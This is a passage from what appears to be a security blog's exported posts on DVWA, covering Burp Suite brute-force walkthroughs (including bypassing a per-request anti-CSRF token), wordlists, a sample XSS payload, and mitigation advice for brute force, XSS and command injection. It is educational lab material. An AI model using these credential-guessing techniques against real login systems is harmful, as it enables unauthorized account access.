brute-force attack types that are supported by the \u0026ldquo;Burp Suite\u0026rdquo; tool.\nFigure 10: BurpSuite Intruder Attack Types Cluster Bomb best suits our requirements. Set the attack type to \u0026ldquo;Cluster Bomb\u0026rdquo; and switch to the \u0026ldquo;Payload\u0026rdquo; sub-tab.\nFigure 11: BurpSuite Brute Force select Attack Type In the \u0026ldquo;Payloads\u0026rdquo; sub-tab, select \u0026ldquo;Payload Set 1\u0026rdquo;, payload type as \u0026ldquo;simple list\u0026rdquo; and paste all the contents in payload options copied from the usernames.txt list.\nThis is for the \u0026ldquo;Username\u0026rdquo; values.\nFigure 12: Usernames Payload Second, select the \u0026ldquo;Payloads\u0026rdquo; sub-tab, set \u0026ldquo;Payload Set 2\u0026rdquo;, set the payload type as \u0026ldquo;simple list\u0026rdquo; and paste all the contents in payload options copied from the passwords.txt list.\nThis is for the \u0026ldquo;Password\u0026rdquo; values.\nFigure 13: Password Payloads Observe that the request count is now set to 100. Using the two lists now, we will be trying out 100 possible combinations.\nLastly, click the \u0026ldquo;brute-force\u0026rdquo; button at the top right to initiate our brute-force attack.\nIn the BurpSuite Community edition it prompts with a warning box as some features are limited. Click \u0026ldquo;Ok\u0026rdquo; to continue. An intruder window pops up, and the payload information and request status will be displayed below.\nIf you take a look, we can see we are getting a 200 status for each request, which means \u0026ldquo;200 Ok\u0026rdquo;.\nHow do we know which payload combination worked and which hasn\u0026rsquo;t?\nOne way is to click on each request with a 200 Ok status, select the \u0026ldquo;Response\u0026rdquo; sub-tab, and search for the string named \u0026ldquo;Username and/or password incorrect\u0026rdquo;. We know this belongs to a failed login attempt.\nIf the string isn\u0026rsquo;t present, it means the credentials combination worked, and that would be our match.\nFigure 14: Brute Force Intruder Attack Results BurpSuite Intruder figured out there is one positive match on the bottom right side of the screenshot. This is a time-consuming approach.\nFocus on the size of the length as shown below. For all incorrect attempts, the response message length is the same \u0026ldquo;4666\u0026rdquo;. Check one of a different length, i.e., 4704.\nFigure 15: Brute Force Payload Match Found Observe whether the username/password combination \u0026ldquo;admin/password\u0026rdquo; worked. Navigate to the response sub-tab, We can see the \u0026ldquo;welcome to the password protected area of admin\u0026rdquo; message.\nHurray!! we found the right password match! 👏\nPassword Match Verification # It is always good practice to re-verify the security bug before we report it.\nMake sure all the Intercepts in the proxy tab are toggled to off. Then, let\u0026rsquo;s return to the brute force page and verify our match to confirm our results.\nFigure 16: Login Successful Yep, our newly found password combination worked.\nExcellent! We found a security bug using a Brute-Force attack, i.e., a guessable username and password.\nYou were able to learn a quick way to Perform a Brute-Force attack using DVWA.\nI have used a short custom-built word list for demo purposes, Give a try with other lists. Search for \u0026ldquo;Brute-Force attack\u0026rdquo; or \u0026ldquo;Brute force wordlist\u0026rdquo;, and you will find many resources.\nHere are some lists from Github.\nImpact of Brute Force Attacks # The impact of a successful brute force attack can be severe.\nUnauthorized access to sensitive information. Financial loss Loss of organization\u0026rsquo;s reputation Leading to potential legal and financial repercussions for the affected individuals or organizations. Loss of customer trust, etc. Figure 17: Preventing Brute Force Attacks Preventing Brute Force Attacks # Security Researchers and web application developers need to be familiar with mitigation techniques. These skills can help them defend web applications from malicious actors.\nSo, let\u0026rsquo;s talk about some ways to detect it and then mitigate it.\nPatterns of Brute Force Attack # Some of the common patterns can help to detect brute-force attacks on our webserver.\nToo many requests originate from a single IP address within a minute or hour. Multiple logins of a single user account from a different IP address and province. Excessive usage of the server resources and bandwidth. Increased number of failed login attempts of various usernames and passwords. Logged into multiple user accounts from a single IP address. (i.e., guessable default password) etc. The above is a small list targeting user credentials, but the patterns vary for other resources.\nDefending Brute Force Attacks # Brute force attacks are difficult to stop, but with good measures, we can limit the attack surface.\nAvoid Using Default/Guessable Passwords # One of the most commonly exploited techniques says some application servers come with pre-defined default passwords for the initially created accounts. (Say \u0026ldquo;admin/password\u0026rdquo;)\nDefault Password Database - cirt.net\nSome companies follow an initial password with the company name followed by a number sequence. Say \u0026ldquo;ABCCompany123\u0026rdquo; or the special character \u0026ldquo;ABCCompany123$\u0026rdquo;, some with established year appending at the end with a prefix of the usernames \u0026ldquo;Username2022\u0026rdquo; etc.\nThese are all unknown until someone figures them out. Once figured out, they are easy to try out with all the user accounts to which the user account has access.\nAdditionally, prevent users from using passwords such as \u0026ldquo;password\u0026rdquo;, \u0026ldquo;admin123\u0026rdquo;, \u0026ldquo;12345\u0026rdquo; etc.\nLimit Login Attempts # One good practice is to limit the number of failed login attempts the user is allowed to make. Beyond 7 failed login attempts, the account is locked for a temporary time period. Like banks, beyond three failed attempts, the user account will be locked out for 24 hours. Or\n👥The challenge with this type is that unauthorized users keep trying with valid user accounts and lock out genuine users. Enforce a Strong Password Policy # A best-designed password policy like the use of a combination of small case letters, upper case letter, numerics, special characters will make it hard to crack for attackers.\nUse of password managers wherever applicable. Avoid re-using the same password. The length of passwords is to be 8 or above. Prevent the use of common dictionary words or guessable sequences. Use of certificates for authentication rather than passwords. Educate users about using a different password for all accounts. Progressive Delay # This is also the best technique where the wait time keeps on multiplying with each failed login attempt.\nSay, initially start with \u0026ldquo;60 Seconds\u0026rdquo; wait time at the first attempt, then 15 minutes of wait time for the second attempt, 60 minutes for the third attempt, and so on it goes.\nGenerally, some applications multiply wait seconds by 60 for each failed attempt.\nUsing Captcha # Captchas are used to filter automated bots or programs and prevent them from abusing the services.\n🤖This is a bit of an inconvenience, but solving a captcha will help verify that it\u0026rsquo;s human and not automation. Multi-Factor Authentication # Adding additional layers of verification makes brute force attack very tough. Using the OTP - One-time passcode, verification of token through email, or Security Questions before logging in makes it more difficult for attackers.\nThe attacker needs to compromise multiple sources to gain access to your user accounts which is very tough but not impenetrable.\nStoring Salted Password Hashes # Even though our application is secured in all possible ways, some third-party plugins or disgruntled employees may lead to compromise of the application and say the attacker was able to gain access to all the passwords in the database.\nWhen a user enters the password say \u0026ldquo;admin123\u0026rdquo; it is not a good practice to store it as plain text. It must be hashed and stored.\nhash(admin123) = GX8N365FMeK9hsRkW9Dl2S/ikcQ Now add salt to the above hash. Where salt does not need to be a secret text but a random text. ( say \u0026ldquo;5MU63YzoOm7ig\u0026rdquo;)\nThe Hash + Salt will be displayed as shown below\nhash(admin123 + 5MU63YzoOm7ig ) = LL/0NIJmT2JcfCXkfOln62pj8Hw The salted hashes make it much more difficult for attackers to crack the passwords offline.\nEven though the attackers have salted hashes, it would be tough for them to crack and re-use them. Meanwhile, requesting the user to reset the passwords in case of compromise makes it more secure.\nWhitelisting # Whitelisting or Allowing a list is an approach of letting only what you trust and blocking all the rest from accessing.\nLet\u0026rsquo;s say for high privileged admin user accounts, employ a way to whitelist the login\u0026rsquo;s from known IP addresses or authorized VPNs and restrict all others from accessing admin features.\nThis reduces a huge attack surface.\nUsing Web application firewalls # Configuring and using Web Application Firewalls (WAFs) protects web applications from a wide range of attacks, such as brute force attacks, denial of service attacks, and malicious input filtering, etc. Examples: AWS WAF, Cloudflare WAF, etc.\nMore information on blocking brute force attacks can be found on the Blocking Brute Force Attacks OWASP site.\nConclusion # Understanding the basics of brute-force attacks and their potential impacts is crucial for safeguarding against cyber threats. By implementing robust security measures, such as strong password policies, multifactor authentication, and network monitoring, individuals and organizations can mitigate the risk of falling victim to a brute-force attack.\nUsing of captcha\u0026rsquo;s can be inconvinient feature, but use it cautiously to prevent automated bots or from automated attacks. Hope by this you are familiar with what a brute force attack is and how it can be exploited.\nKeep Learning!! 😄\n","date":"30 September 2022","externalUrl":null,"permalink":"/dvwa-brute-force-attack-and-prevention-explained/","section":"Posts","summary":"","title":"DVWA - Brute Force Attack and Prevention Explained","type":"posts"},{"content":"Cross-Site Scripting(XSS) is a serious security vulnerability. In short, Attackers use this for a wide range of security attacks like stealing user session cookies, redirecting all the users to a malicious website, logging keystrokes of the victim\u0026rsquo;s activity, defacing an organization\u0026rsquo;s website, even can use the victim system as a bots for malicious activity, etc.\nA single technique cannot mitigate XSS vulnerability completely. Using the right defenses can help in preventing XSS attacks.\nOne of the best practices is \u0026ldquo;Defense-In-Depth\u0026rdquo;, Enabling multiple layers of defense so even if a layer fails, other layers of protection can minimize the impact of an XSS attack.\nUse Frameworks # In modern development practices, developers like to code faster and avoid recreating the wheel.\nRather than building applications from scratch, using the frameworks can protect the application from lots of vulnerabilities. As security features are in-built into frameworks and just need to enable.\nFor example input validation checks, XSS prevention, preventing access control issues, etc. (Some PHP frameworks include laravel, CodeIgniter,etc.)\nAdditionally, these frameworks do address the security vulnerabilities when discovered, all you need to ensure is that you are using the latest version of the application framework.\nValidate Client Data # One of the most crucial steps is to validate each and every input received from the client.\nAs we have demonstrated throughout our articles, any data coming from the client side can be modified with the help of intercepting proxies.\nFor the same reason, each and every piece of data coming from the client must be validated then must follow through next steps of verification. Output Encoding # Output encoding is one of the techniques used to take user-controlled data and safely display it without interpreting it as code, and considering it as text.\nBelow is an example XSS payload.\n\u0026lt;script\u0026gt;alert(document.domain);\u0026lt;/script\u0026gt; HTML-encoded text of XSS payload will be displayed as shown below.\n\u0026amp;lt;script\u0026amp;gt;alert(document.domain);\u0026amp;lt;/script\u0026amp;gt; \u0026ldquo;\u0026lt;\u0026rdquo; changed to \u0026ldquo;\u0026lt;\u0026rdquo; \u0026ldquo;\u0026gt;\u0026rdquo; changed to \u0026ldquo;\u0026gt;\u0026rdquo; As the browser parses HTML, JavaScript, CSS, and URL differently. Each much be encoded depending on the requirements.\nAnother good example in PHP, the \u0026ldquo;htmlspecialchars\u0026rdquo; function will convert the \u0026ldquo;\u0026lt;\u0026rdquo; less than, \u0026ldquo;\u0026gt;\u0026rdquo; greater than symbols to HTML entities such as \u0026ldquo;\u0026amp;lt;\u0026rdquo; for less than, \u0026ldquo;\u0026amp;gt;\u0026rdquo; for greater than respectively. This again makes the application treat all as text without breaking the syntax.\nURL, HTML, JavaScript, and CSS can be encoded.\nSanitization # In some cases, the users need to retain HTML code as it is. In this case, the output encoding will break the document structure.\nTo retain the data as it is, the sanitization technique is used.\nAs part of the sanitization, it produced a new HTML document that contains only the \u0026ldquo;safe\u0026rdquo; or allowed HTML tags. This prevents XSS, this is performed in combination with the whitelist and blacklist approach.\nExample, In PHP we used a \u0026ldquo;strip_tags\u0026rdquo; function is used to filter out all the HTML tags, the \u0026ldquo;addslashes\u0026rdquo; function escapes the special chars like a quote, and a double quote with backward slashes to retain it as text without breaking code syntax.\nXSS Header # The X-XSS-Protection response header is one of the features used to prevent the reflected XSS from executing.\nBelow is an example of enabling the XSS protection header by completely blocking script execution.\nX-XSS-Protection: 1; mode=block The following can be ignored if the strongly protected \u0026ldquo;Content-Security-Policy\u0026rdquo; is being used.\nHTTPOnly - Cookie Attribute # This is another cookie flag that helps in reducing the XSS impact. Enabling the \u0026ldquo;HTTPOnly\u0026rdquo; flag for session cookies can prevent the javascript code from accessing it.\nContent-Type # Content-Type is one of the response headers which specifies the type of content delivered. It is recommended to set the script content to \u0026ldquo;application/json\u0026rdquo; than \u0026ldquo;text/html\u0026rdquo;\nContent-Type: application/json Setting the content type to \u0026ldquo;application/json\u0026rdquo; prevents the execution of script tags. Content Security Policy (CSP) # Content Security Policy is an added layer of security protection. This helps in detecting and mitigating the XSS and other code injection attacks.\nCSP instructs the browser on how to deal with the content. On CSP-enabled websites, it becomes very hard to exploit the XSS vulnerability.\nA Content-Security-Policy header is appended by the server with policy configuration.\nContent-Security-Policy: default-src \u0026#39;self\u0026#39;; img-src *; script-src userscripts.example.com Above is an example of CSP, instructing the browser to permit only content from the same site, images from anywhere, and execute scripts only from \u0026ldquo;userscripts.example.com\u0026rdquo; Whitelisting rather Blacklisting # Whitelisting or allowing a known good is an approach of letting only what you trust and rejecting all the rest.\nWhitelist is one of the supporting steps adding to all the above defense layers. Even in the case of unknown payloads as well whitelist defends well.\nLet\u0026rsquo;s say allowing the trusted characters upper case, small case letters, numerics, and some special characters based on need.\nLimit usage of the blacklist only for reasonable business requirements.\nUse Web Application Firewalls (WAFs) # Configuring and using Web Application Firewalls, protects web applications from a wide range of attacks like XSS, Brute Force attacks, Denial of Service attacks, Malicious input filtering, etc. a lot more.\nSay AWS WAF, Cloudflare WAF, etc.\nAdditional References: # More information on mitigating XSS attacks can be found on the OWASP site.\nCross Site Scripting Prevention - OWASP Cheat Sheet DOM based XSS Prevention - OWASP Cheat Sheet ","date":"20 August 2022","externalUrl":null,"permalink":"/mitigating-xss-vulnerability/","section":"Posts","summary":"","title":"Mitigating XSS Vulnerability","type":"posts"},{"content":"In this post, we will be covering the ways available to mitigate the command injection vulnerability.\nFirstly, we will go through the standard practices that are generally used for mitigating the command injection vulnerabilities, followed by we will be covering how the vulnerability has been fixed in the DVWA application.\nAvoid Calling OS Command Directly # One of the most effective ways is to avoid calling all the system commands directly by taking from the user input.\nUsing the built-in library functions is a good option, as it performs the tasks intended without tampering.\nIn our command injection examples, the application takes the domain name, and IP address then followed by we could append the additional system commands. The application doesn\u0026rsquo;t filter and is directly passed on to the server for execution.\nIf you were able to view the source code, the \u0026ldquo;shell_exec()\u0026rdquo; function in PHP is being used for taking all our user inputs and passing them to the server.\nshell_exec( \u0026#39;ping -c 4\u0026#39; . USER_INPUT ); The escapeshellcmd() or escapeshellarg() can be used instead of \u0026ldquo;shell_exec()\u0026rdquo; to prevent command injection. What it does is, it passes everything within a single quote ensuring to run all of one text rather than breaking it into multiple commands.\nIf you think, in your current scenario you can not avoid it but that\u0026rsquo;s the only way to go ahead. then there are other ways to mitigate it. Whitelisting # As we covered whitelisting earlier. Whitelisting is an approach of letting only what you trust and rejecting all the unknown.\nAllowing only the valid characters, like small case letters, upper case letters, and numerics. Limiting only the special characters which are supposed to be used. (say, allow period \u0026ldquo;.\u0026rdquo; and reject all) Only allowing the system command that the user is supposed to use. In the command injection \u0026ldquo;high\u0026rdquo; example, we say the blacklisting is being used to filter a lot of characters, where the \u0026lsquo;|\u0026rsquo; OR and SPACE operator are being filtered than of \u0026ldquo;|\u0026rdquo; only OR operator.\nBlacklisting can be used but is more of an error-prone approach.\nStrong Input Validation # Validating the inputs in conjunction with whitelisting provides a strong defense.\nTreating every input from the client can be tampered with, verifying the inputs and ensuring it is clean from all types of malicious payloads.\nA parameterization is an option where the command and the input data can be segregated using a structured mechanism. This helps in quoting the input data before processing.\nNever escape the user input with metacharacters directly as it is more error-prone.\nAdditionally, the Regular Expressions can also be used for filtering the input before processing.\nLeast Privilege User Account # Use a user account with minimal privileges to execute the needed system operations on the server rather than one having admin privileges.\nCommand Injection - Fix (DVWA) # Let\u0026rsquo;s see how the vulnerability was fixed in the DVWA application.\nLog into the DVWA application and set the security level to \u0026ldquo;Impossible\u0026rdquo;.\nNavigate to the \u0026ldquo;Command Injection\u0026rdquo; and click on the \u0026ldquo;View Source\u0026rdquo; button at the bottom.\nNote, only the partial code is displayed below. // Split the IP into 4 octects $octet = explode( \u0026#34;.\u0026#34;, $target ); // Check IF each octet is an integer if( ( is_numeric( $octet[0] ) ) \u0026amp;\u0026amp; ( is_numeric( $octet[1] ) ) \u0026amp;\u0026amp; ( is_numeric( $octet[2] ) ) \u0026amp;\u0026amp; ( is_numeric( $octet[3] ) ) \u0026amp;\u0026amp; ( sizeof( $octet ) == 4 ) ) { // If all 4 octets are int\u0026#39;s put the IP back together. $target = $octet[0] . \u0026#39;.\u0026#39; . $octet[1] . \u0026#39;.\u0026#39; . $octet[2] . \u0026#39;.\u0026#39; . $octet[3]; // Determine OS and execute the ping command. Code Snippet 1: Command Injection - Mitigation In the above screenshot, the developer now has removed all types of blacklisting approaches and moved to a whitelist.\nAt the moment, only numeric IP addresses and a special character of a dot are allowed and reject all the other input.\nThis reduces the attack surface to a greater extent for exploitation.\nMore information about the mitigation techniques can be found on the OS Command Injection Defense - OWASP Cheat Sheet.\nI Hope, Now you can secure your web applications from the command injection vulnerabilities. Thank you! :)\n","date":"10 August 2022","externalUrl":null,"permalink":"/mitigating-command-injection/","section":"Posts","summary":"","title":"Mitigating Command Injection","type":"posts"},{"content":"This section will be a kind of recap of the Brute Force vulnerability covered so far and some additional fine-tuning options available in the BurpSuite tool.\nRequired Tool Set # A working DVWA docker image will be needed. BurpSuite Community Edition tool. Wordlists (username.txt and password.txt) If you are unable to follow any of the sections, refer back to the earlier posts.\nDVWA - Brute Force Attack and Prevention Explained This detailed guide explains Brute Force Attacks, how they work, and ways to prevent them.\nDVWA Brute Force Attack - Medium This detailed post explains Brute-Force Attacks\u0026rsquo; Medium severity using DVWA and how partial security fixes can be bypassed.\nDVWA Brute Force Vulnerability - Demo # Log into your DVWA environment, and click on the \u0026ldquo;Security level\u0026rdquo; menu on the left sidebar.\nSelect \u0026ldquo;High\u0026rdquo; and click on the submit button, as shown below, to ensure the Security Level is updated.\nFigure 1: Setting DVWA Security Level to High Re-testing Scenario # Imagine the development team returning again and informing you that the vulnerability is fixed and needs re-verification.\nLet\u0026rsquo;s go ahead and repeat all the steps.\nLaunch the BurpSuite Community Tool. Navigate to the \u0026ldquo;Proxy\u0026rdquo; tab -\u0026gt; \u0026ldquo;Intercept\u0026rdquo; sub-tab and click on the \u0026ldquo;Open Browser\u0026rdquo; Once the Chromium browser is launched, login to the DVWA application using admin credentials. Visit the \u0026ldquo;Brute Force\u0026rdquo; link in the menu. Switch to the Burp Suite \u0026ldquo;Proxy\u0026rdquo; tab, select the \u0026ldquo;Intercept\u0026rdquo; sub-tab, and toggle \u0026ldquo;Intercept is Off\u0026rdquo; to enable it. Enter the random values in the username and password fields, then click on \u0026ldquo;Login\u0026rdquo;. The \u0026ldquo;Intercept\u0026rdquo; captured login request will be displayed below. Figure 2: Brute Force Login Request - Security Level High In line number 1, the test values are placed in the username and password fields. In line 16, the security level parameter is set to high.\nAdditionally, a new \u0026ldquo;user_token\u0026rdquo; is being passed in the URL parameter compared to the previous requests.\nA copy of the previous request is provided below.\nFigure 3: Brute Force Login Request - Security Level Medium Click on the \u0026ldquo;Action\u0026rdquo; button or right-click and select \u0026ldquo;Send to the Intruder\u0026rdquo;.\nIn payload positions, \u0026ldquo;Clear\u0026rdquo; all the selected payload placeholders and then select the \u0026ldquo;Username\u0026rdquo; value field and the \u0026ldquo;Password\u0026rdquo; value field by clicking the \u0026ldquo;Add\u0026rdquo; button for placing custom payloads.\nChoose the attack type to \u0026ldquo;Cluster bomb\u0026rdquo;\nThe same word list of common usernames and passwords can be used for the current scenario. Save the text files onto your system or use copy-paste to load the information in the payloads tab.\nusernames.txt\nadmin administrator user john dvwa bob alice root superuser super passwords.txt\nadmin admin123 password password123 user user123 administrator passw0rd r3m3mb3rM3 admin123$ In the \u0026ldquo;Payloads\u0026rdquo; sub-tab, select \u0026ldquo;Payload Set 1\u0026rdquo;, set the payload type as \u0026ldquo;simple list\u0026rdquo;, and paste all the contents in payload options copied from the usernames.txt list.\nSecond, select the \u0026ldquo;Payloads\u0026rdquo; sub-tab, set \u0026ldquo;Payload Set 2\u0026rdquo;, set the payload type as \u0026ldquo;simple list\u0026rdquo; and paste all the contents in payload options copied from the passwords.txt list.\nSwitch to the \u0026ldquo;Options\u0026rdquo; sub-tab and enable the \u0026ldquo;Grep - Match\u0026rdquo; with the \u0026ldquo;incorrect\u0026rdquo; string. so we can understand which requests have failed.\nFigure 4: Intruder Grep Match - Incorrect string Lastly, click on \u0026ldquo;Start Attack\u0026rdquo; and monitor the results.\nFailed Intruder Attack Results # Only in one response was the \u0026ldquo;username and/or password incorrect\u0026rdquo; string found.\nFor all other requests, we are getting \u0026ldquo;302\u0026rdquo; status codes instead of \u0026ldquo;200 OK\u0026rdquo;, which means something is not working and our brute force attack is failing.\nNow, shall we assume that the \u0026ldquo;Vulnerability is fixed\u0026rdquo; and close the security flaw?\nWell, we can close it. But this is a strange scenario in which we don\u0026rsquo;t see errors or warnings.\nLet\u0026rsquo;s analyze more thoroughly and see what exactly is happening here. and why we are getting \u0026ldquo;302 Found\u0026rdquo; redirects.\nRemember, you can automate only if application behaviour is consistent. Re-submit the username and password with new random values on the Brute Force login page and intercept the login request.\nAnalyzing with the BurpSuite Tool without going to the browser gives us more control over the HTTP messages. Therefore, I want to view the HTTP response messages in the Burp Suite itself.\nLet\u0026rsquo;s enable the option to Intercept and view the \u0026ldquo;Response\u0026rdquo; messages received from the server before sending them to the Browser.\nVisit the \u0026ldquo;Proxy\u0026rdquo; tab -\u0026gt; Select \u0026ldquo;Options\u0026rdquo; sub-tab, scroll down to \u0026ldquo;Intercept Server Responses\u0026rdquo; and enable \u0026ldquo;Intercept responses based on the following rules\u0026rdquo; as displayed below.\nFigure 5: BurpSuite Proxy - Enable Intercept Server Responses Switch to the \u0026ldquo;Intercept\u0026rdquo; sub-tab under the \u0026ldquo;Proxy\u0026rdquo; tab and click on the \u0026ldquo;Forward\u0026rdquo; button.\nThe \u0026ldquo;Forward\u0026rdquo; button will send the request to the server and now start \u0026ldquo;Intercept\u0026rdquo; immediate HTTP \u0026ldquo;Response\u0026rdquo; received from the server and display it as shown below.\nBy clicking on the \u0026ldquo;Forward\u0026rdquo; button again, the response is now sent to the browser.\nToggle the proxy \u0026ldquo;Intercept is on\u0026rdquo; to disable it.\nUse the BurpSuite \u0026ldquo;Chromium browser\u0026rdquo; session, manually try for random username/passwords say \u0026ldquo;administrator/admin123\u0026rdquo;, \u0026ldquo;admin/admin123\u0026rdquo;, \u0026ldquo;user/user123\u0026rdquo; etc.. with 4 or 5 incorrect credentials.\nFor all incorrect attempts, we keep getting the \u0026ldquo;Username and/or password incorrect.\u0026rdquo; message. This confirms that the \u0026ldquo;Brute Force\u0026rdquo; attack still does exist, which means the Vulnerability remains Open. Yay!!. :) Now the question is, why is our Intruder tool unable to pick it up?\nLet\u0026rsquo;s review all the previous HTTP messages and see if we can find any patterns.\nThe Burp Suite HTTP message history can be found under the \u0026ldquo;Proxy\u0026rdquo; tab -\u0026gt; \u0026ldquo;HTTP history\u0026rdquo; sub-tab.\nFigure 6: BurpSuite HTTP History Observing the HTTP GET requests that we have manually tried, the username and password values are being passed, but one parameter value keeps on changing in the \u0026ldquo;URL\u0026rdquo; section.\nRemember a new parameter is being passed on the Login request? Yes, \u0026ldquo;user_token\u0026rdquo;.\nThe \u0026ldquo;user_token\u0026rdquo; keeps updating for each request. Therefore, we cannot use the same \u0026ldquo;user_token\u0026rdquo; for all HTTP requests.\nThis is the reason our tool fails. If we perform brute force manually, it works!\nFinding the origin of \u0026ldquo;user_token\u0026rdquo; # Let\u0026rsquo;s find out from where the \u0026ldquo;user_token\u0026rdquo; is being set and updated.\nIn the case of HTTP, it can be set in Headers, Response Bodies, or Cookies. Let\u0026rsquo;s review the HTTP responses received one by one.\nFigure 7: Finding User Token After a thorough review Of one of the requests from HTTP history, I was able to find out it is being set in \u0026ldquo;HTTP Response Body\u0026rdquo;\n\u0026lt;input type=\u0026#39;hidden\u0026#39; name=\u0026#39;user_token\u0026#39; value=\u0026#39;90f9f7a06213b032dbe9e5d1d4717ce0\u0026#39; /\u0026gt; The code is a simple HTML tag that is hidden in the background of the \u0026ldquo;Login\u0026rdquo; page and passed every time when the user submits \u0026ldquo;username\u0026rdquo; and \u0026ldquo;*password*” credentials.\nBased on the above request, the HTML input tag is dynamically generated on the fly with an updated \u0026ldquo;user_token\u0026rdquo;.\nWe found the source! Can you automate it with Burp Intruder? Yes\nOne more important point to discuss before we proceed. Choosing the Intruder Attack Type # Guess what the attack type could be here?\nCluster Bomb? NO\nFigure 8: Pitchfork vs Cluster Bomb Remember what the \u0026ldquo;Cluster bomb\u0026rdquo; does? It tries out all possible permutations and combinations by varying the first \u0026ldquo;Payload 1\u0026rdquo; and keeping the \u0026ldquo;Payload 2\u0026rdquo; standard, then jumps to the next permutation. A big challenge here is, you cannot keep the \u0026ldquo;user_token\u0026rdquo; same for multiple requests.\nTherefore, the \u0026ldquo;cluster bomb\u0026rdquo; doesn\u0026rsquo;t meet our requirements.\nWhat about \u0026ldquo;Pitchfork\u0026rdquo;? # Yes, the \u0026ldquo;Pitchfork\u0026rdquo; option helps in the current scenario. Takes the first payload from \u0026ldquo;Payload set 1\u0026rdquo; and the first payload from \u0026ldquo;Payload set 2\u0026rdquo; and then iterates through.\nOverall, our current wordlist of usernames and passwords generates only 10 possible payload requests, as shown below. We could definitely miss our valid combination match. i.e., \u0026ldquo;admin/password\u0026rdquo;.\nSo, to brute force from here on, we need to use the username, which definitely exists on the server. (say \u0026ldquo;admin\u0026rdquo;)\nThe DVWA dev team gave us a good challenge. Let\u0026rsquo;s put in additional efforts to perform the Brute Force attack.\nFine-tuning the Intruder Payload # Repeat all the steps from step 1 to step 7 mentioned above, from the launching of the BurpSuite to sending the new log-in request to the intruder.\nUse a completely new intercepted Login request, else intruder is bound to fail.\nChoose the \u0026ldquo;Pitchfork\u0026rdquo; attack type and select two payload positions. i.e. password value field and user_token value field as displayed above.\nThis time for payloads, the first position will be of the password value field and the second position will be of the user_token value field.\nSelect the \u0026ldquo;Payloads\u0026rdquo; sub-tab, set \u0026ldquo;Payload Set 1\u0026rdquo;, payload type as \u0026ldquo;simple list\u0026rdquo; and paste the passwords.txt list contents into payload options.\nSecond, select the \u0026ldquo;Payloads\u0026rdquo; sub-tab, set \u0026ldquo;Payload Set 2\u0026rdquo;, and payload type as \u0026ldquo;recursive grep\u0026rdquo; from the list. This is for the \u0026ldquo;user_token\u0026rdquo; field.\nThe \u0026ldquo;recursive grep\u0026rdquo; is used when you want to extract specific data from the previous response and use it in the request as a payload.\nThe \u0026ldquo;Grep - Extract\u0026rdquo; feature is used to find specific strings based on the pattern or use regular expressions to get useful information from the HTTP response.\nFigure 9: Grep Extract - Add Next, go to the \u0026ldquo;Intruder\u0026rdquo; tab -\u0026gt; \u0026ldquo;Options\u0026rdquo; sub-tab, scroll down to \u0026ldquo;Grep Extract\u0026rdquo; and click on the \u0026ldquo;Add\u0026rdquo; button.\nA new window named \u0026ldquo;Define extract grep item\u0026rdquo; is loaded.\nIn the \u0026ldquo;Define extract grep item\u0026rdquo; window, click on the \u0026ldquo;Fetch Response\u0026rdquo; button on the right side.\nThe \u0026ldquo;Fetch response\u0026rdquo; will take the currently configured request in the \u0026ldquo;fetch\u0026rdquo; tab and fetch, the server response for it.\nOnce the HTTP response is loaded, Using the mouse select the user_token value then select only the value string highlighted as shown below.\nThe \u0026ldquo;Start after expression\u0026rdquo; and \u0026ldquo;End at delimiter\u0026rdquo; values will be auto-populated. Just click on the \u0026ldquo;OK\u0026rdquo; button to proceed.\nUse \u0026ldquo;Ctrl - c\u0026rdquo; to copy the token value \u0026ldquo;1802dab0e42ee4ef48e71d491981abb1\u0026rdquo; will be used for updating initial payload.\nSwitch back to the Intruder Payloads section. Observe the \u0026ldquo;Grep Extract\u0026rdquo; pattern updated and displayed in \u0026ldquo;Payload Options\u0026rdquo;.\nNow, set the \u0026ldquo;initial payload for first request\u0026rdquo; value as the one we copied earlier, the latest token \u0026ldquo;1802dab0e42ee4ef48e71d491981abb1\u0026rdquo;.\nAll set, but there is one more thing to do.\nRemember, a new user_user token can be fetched only when you send each request one by one after updating. If thrown multiple concurrent requests at once than we can\u0026rsquo;t get correct user token in sequence.\nIn the \u0026ldquo;Intruder\u0026rdquo; tab \u0026ldquo;Resource Pool\u0026rdquo; is a place where we can fine-tune the number of threads to use or delay between requests etc.\nNavigate to the \u0026ldquo;Intruder\u0026rdquo; tab and select the \u0026ldquo;Resource Pool\u0026rdquo; sub-tab. Select \u0026ldquo;Create new resource pool\u0026rdquo; named \u0026ldquo;Brute Force Attack - High\u0026rdquo;.\nSet the \u0026ldquo;Maximum concurrent requests\u0026rdquo; to 1.\nDone, we have configured our intruder and now click to \u0026ldquo;Start attack\u0026rdquo; button.\nWow!! finally accomplished. 😄\nThe intruder configuration works, and we no longer see the \u0026ldquo;302 Found\u0026rdquo; redirect status codes being displayed.\nObserve the user_token value taken from the previous response field, displayed under the \u0026ldquo;value\u0026rdquo; row and updated in the request as the \u0026ldquo;Payload 2\u0026rdquo;. The fine-tuning worked!\nLet\u0026rsquo;s check the one with of different length \u0026ldquo;4792\u0026rdquo; and Yes, We found our credentials match (admin/password).\nThe \u0026ldquo;Grep - Match\u0026rdquo; flags can also be enabled.\nWell done!! 🎉\nThus, the Brute force vulnerability still remains open.\nWe have covered a lot of ground here to exploit the Brute Force attack. Re-visit the article and keep practicing until you become familiar with it.\nCheck out the below article to learn more about prevention techniques.\nDVWA - Brute Force Attack and Prevention Explained\n","date":"4 August 2022","externalUrl":null,"permalink":"/dvwa-brute-force-attack-high-severity/","section":"Posts","summary":"","title":"DVWA Brute Force Attack - High Severity","type":"posts"},{"content":"I hope you are familiar with brute-force attacks by now.\nIn the current section, we will explore a bit more about the Brute Force attack and options available in the BurpSuite tool for effectively identifying successful brute-force attempts.\nIf you haven\u0026rsquo;t read the previous article about the Brute Force attack, feel free to refer to the bookmark below.\nDVWA - Brute Force Attack and Prevention Explained\nDVWA Brute Force Vulnerability - Demo # Imagine we found a vulnerability and reported it to the DVWA development team. The team reverted, claiming the security flaw was fixed.\nTrust but Verify\nIt is always a good practice to re-verify and ensure that the vulnerability is mitigated as per best practices. Let\u0026rsquo;s verify.\nLog into the DVWA application. In the sidebar, scroll to the bottom of the page and click on \u0026ldquo;DVWA Security\u0026rdquo;. A page will load as shown below.\nFigure 1: Choosing DVWA Security Level to Medium Set the security level to \u0026ldquo;Medium\u0026rdquo; and click on the Submit button. Ensure it is updated and displayed on the left side at the bottom of the page.\nLaunch the BurpSuite tool, navigate to the \u0026ldquo;Proxy\u0026rdquo; tab, and click on the \u0026ldquo;Open Browser\u0026rdquo; button.\nVisit the DVWA application, Select the \u0026ldquo;Brute Force\u0026rdquo; vulnerability, and then enter any random credentials as discussed in the previous article.\nEnable the intercept option and capture the login request displayed, as shown below. Observe that the security parameter value is set to medium in line 16.\nFigure 2: 